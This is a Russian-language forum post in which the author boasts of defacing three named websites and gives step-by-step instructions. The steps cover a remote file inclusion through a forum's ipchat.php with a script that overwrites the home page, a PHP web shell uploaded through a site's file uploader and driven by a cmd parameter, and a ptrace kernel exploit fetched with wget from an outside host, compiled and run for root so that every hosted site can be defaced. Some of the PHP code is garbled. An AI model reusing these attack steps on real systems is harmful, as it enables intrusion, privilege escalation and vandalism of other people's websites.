Для начала сразу хочу оговориться, тем, что на взломанных сайтах не была удалена никакая информация, все это делалось только для того, чтобы показать администраторам сайтов на дыры в системе. Итак, начнем, первый сайт: http://itmofootball.ttp.ru был взломан при помощи css-уязвимости в форуме Invision Power Board. Смысл ее был в том, что скрипт ipchat.php включал в себя строку, которая позволяла указывать файлы находящиеся вне сервера на котором сам сайт располагался, итак, смотрим, как это было.
1) Идем на http://itmofootball.ttp.ru/forum/ipchat.php и видим там 0. Хорошо, такой скрипт есть…
2) Идем на wwwsecuritylab.ru и читаем про эту уязвимость то, что чтобы ее реализовать, надо указать скрипту параметр root_path который приведет его на ваш сайт.
3) Регестрируем сайт: http://rusproj.by.ru
4) Пишем скрипт на PHP
5) Error 404! Admin not found! "; $fp=fopen("../index.html","w");
flock($fp, 2);
fwrite($fp,$context);
flock($fp, 3);
fclose($fp);
?> Смысл которого состоит в том, чтобы заменить главную страницу сайта на свою.
6) Называем скрипт global_conf.php и выкладываем себе на сайт
7) Собственно процесс взлома: Пишем запрос в IE http://itmofootball.ttp.ru/forum/ipchat … proj.by.ru
8) Смотрим главную страницу и видим дефейс:))

Итак это хорошо конечно, но зная только этот баг, далеко не уйдешь, думают все… Правильно думают, но знать их не обязательно, достаточно фантазии подумал я, когда нашел сайт wwwyoderandarmstrong.com Смысл состоит в том, что на сайте есть такая вещь, как uploader, который позволяет закачивать на сайт файлы. Итак рассмотрим ее:
1) Идем в wwwyoderandarmstrong.com/get_file.html
2) Пишем скрипт на PHP, который называется Shell’ом и имеет такое содержание(может быть улучшено в связи с фантазией):

3) Закачиваем его на сайт.
4) Ищем папку, куда это закачалось, для этого просто перебираем имена такие как uploads, upload, get, и т.д.
5) Пишем путь: http://www.yoderandarmstrong.com/upload … hp?cmd=id;
6) Смотрим свои права, ага, они у нас Апача, хорошо, меня это устраивает.
7) Делаем дефейс: http://www.yoderandarmstrong.com/uploads/shell.php?cmd=cd ..; echo%20"Hacked%20by%20Dima-k17” > index.html;
8) Смотрим дефейс
Для тех, кто в танке, я объясню, что закачал я им файл, который вызывает командную строку и имеет параметр cmd в котором я указываю, что я хочу написать в комммандной строке.

[font=Comic Sans Ms][size=18]Так, метод скрипт-кидди + фантазия я надеюсь понятен, тогда переходим дальше, следующая цель для нас буржуйский хостинг: http://www.primesource-hosting.com Для того, чтобы его сломать пришлось зарегистрироваться на нем. Итак:
1) Регистрируем поддомен http://demo.primesource-hosting.com
2) Закачиваем на него Shell как в предыдущем пункте
3) Смотрим свои права, естественно они низкие
4) Читаем статьи и упорно думаем
5) Пишем uname –a; в Shell’е и обалдеваем от ответа! Версия ядра 2.4.18
6) Ищем эксплоиты для этой версии и находим ptrace/kmod и mytrace
7) Далее проще, нам открыта папка /tmp;
8) Заливаем эксплоит: wget -O /tmp/mptrace.c http://packetstormsecurity.nl/0304-expoits/myptrace.c;
9) Переходим в папку cd /tmp;
10) Компилируем эксплоит: gcc -o exploit myptrace.c;
11) Запускаем его: ./exploit;
12) Итак, у нас открылся Shell на порту 24876 с правами рута(только он через 1 день уже накроется), теперь просто коннектимся к нему telnet’ом, находим главную страницу в папке /home/primesou/public_html/ и заменяем на свою также как и в предыдущем пункте.
13) Смотрим папку /home/ и видим, что все папки, которые там есть, все это сайты хостящиеся здесь. Теперь просто подряд заходим во все эти папки и дефейсим все сайты.[/size]

Итак, я надеюсь, что читатель понял и сможет повторить хотя бы уровень 1-ый и 2-ой и приведенной мной статьи, но не во-вредительских целях, а для обучения и дальнейшей помощи взломанной системе:)))[/size][/font]